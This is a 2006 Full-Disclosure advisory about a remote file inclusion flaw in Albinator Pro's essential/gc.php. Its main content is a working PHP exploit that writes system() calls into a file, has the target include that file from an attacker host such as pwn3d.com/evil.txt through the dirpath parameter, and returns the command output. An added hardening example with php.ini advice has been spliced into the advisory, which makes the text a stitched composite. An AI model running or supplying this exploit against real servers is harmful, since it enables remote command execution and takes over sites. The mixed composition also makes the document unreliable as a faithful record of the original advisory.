SECURITYVULNS:DOC:12537 (May 04, 2006)

[Full-disclosure] [XPA] - Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability

2006-05-04 00:00:00, vulners.com

===========================================================================
XOR Crew :: Security Advisory 0day GIVE AWAY (date?) 2/20/2006

Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability

http://www.xorcrew.net/ http://www.xorcrew.net/ReZEN

:: Summary

   Vendor       :  Albinator
   Vendor Site  :  http://www.dreamcost.com/
   Product(s)   :  Albinator Pro - Photo Album/Gallery Management System
   Version(s)   :  All
   Severity     :  Medium/High
   Impact       :  Remote Command Execution
   Release Date :  2/11/2006
   Credits      :  ReZEN (rezen (a) xorcrew (.) net)

===========================================================================

I. Description

Albinator is developed in PHP and backed by a fast MySQL database. With
its unique features, it instantly and automatically organizes your
website users' digital images into compact digital photo albums ideal for
sharing and emailing to friends and family. It automatically generates
thumbnails of the photos for easy browsing.

===========================================================================

II. Synopsis (0day give away because r0t is stupid)

THIS BUG WORKS FOR ALL VERSIONS OF ALBINATOR!!!

(r0t you are a moron, stick to useless XSS exploits please thanks)

There is a remote file inclusion vulnerability, which allows remote
command execution, in /essentials/gc.php and in
essentials/integration.inc.php. The bug is on lines 2 and 3:

include_once($dirpath . "essential/config.php");
include_once($dirpath . "essential/config_tables.inc.php");

The $dirpath variable is not set before it is used in include_once(). With
register_globals enabled, a request parameter named dirpath therefore
supplies it, and with allow_url_fopen enabled the resulting path can be a
remote URL, whose contents PHP fetches and executes. The vendor and
support team have been contacted.
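The following is an added example, not Albinator's code, showing how an include like the one on lines 2 and 3 can be hardened: fix the base path in the file instead of leaving it to the request, and refuse any candidate that is a stream wrapper URL, does not exist, or resolves outside the application root. The root handling and helper names are assumptions.

```php
<?php
// Added example, not Albinator's code: hardening the include on lines 2 and 3
// of essential/gc.php. Root handling and the helper names are assumed.

// 1. Never let the base path come from the request: fix it in the file.
//    An unset $dirpath is exactly what register_globals lets ?dirpath= fill.
$dirpath = dirname(__DIR__) . '/';   // app root, one level above essential/

// 2. Resolve a relative name against a fixed root and refuse anything that
//    is a URL/stream wrapper, does not exist, or escapes the root.
//    Returns the absolute path, or null when it must not be included.
function resolve_app_path(string $root, string $relative): ?string
{
    // http://, ftp://, php://, data: ... are how remote inclusion works;
    // a plain relative file name never carries a scheme.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        return null;
    }
    $realRoot = realpath($root);
    $real     = realpath($root . '/' . $relative);
    if ($realRoot === false || $real === false) {
        return null;                        // missing root or file
    }
    // Traversal check: the resolved file must sit strictly below the root.
    if (strpos($real, $realRoot . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

function safe_include_once(string $root, string $relative): bool
{
    $path = resolve_app_path($root, $relative);
    if ($path === null) {
        return false;
    }
    include_once $path;
    return true;
}

// Constructed inputs exercising the checks; only the first one is accepted.
$candidates = [basename(__FILE__), 'http://example.invalid/evil.txt?',
               '../../../../etc/passwd', 'php://input'];
foreach ($candidates as $candidate) {
    $ok = resolve_app_path(__DIR__, $candidate) !== null;
    printf("%-34s -> %s\n", $candidate, $ok ? 'allowed' : 'rejected');
}
```

Disabling register_globals and allow_url_fopen/allow_url_include in php.ini removes the remote-fetch path entirely; the checks above still protect against local traversal when those settings cannot be changed.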

===========================================================================

III. Exploit code:

-----BEGIN-----

<?php
/*
Albinator Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
url: http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/path to albinator/essential/gc.php?dirpath=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd  = isset($_POST["cmd"])  ? $_POST["cmd"]  : "";
$turl = isset($_POST["turl"]) ? $_POST["turl"] : "";
$hurl = isset($_POST["hurl"]) ? $_POST["hurl"] : "";

$form = "<form method=\"post\" action=\"" . $_SERVER["PHP_SELF"] . "\">"
    . "turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"" . $turl . "\"><br>"
    . "hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"" . $hurl . "\"><br>"
    . "cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"" . $cmd . "\"><br>"
    . "<input type=\"submit\" value=\"Submit\" name=\"submit\">"
    . "</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit'])) {
    echo $form;
} else {
    // test.txt is the file that hurl is expected to serve
    $file = fopen("test.txt", "w+");
    fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"" . $cmd . "\"); system(\"echo ++END++\"); ?>");
    fclose($file);

    $file = fopen($turl . $hurl, "r");
    if (!$file) {
        echo "<p>Unable to get output.\n";
        exit;
    }

    echo $form;

    $line = "";
    while (!feof($file)) {
        $line .= fgets($file, 1024) . "<br>";
    }
    // keep only the text between the ++BEGIN++ and ++END++ markers
    $tpos1 = strpos($line, "++BEGIN++");
    $tpos2 = strpos($line, "++END++");
    $tpos1 = $tpos1 + strlen("++BEGIN++");
    $tpos2 = $tpos2 - $tpos1;
    $output = substr($line, $tpos1, $tpos2);
    echo $output;
}
?>

------END------

===========================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, cijfer, D2K.

===========================================================================


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/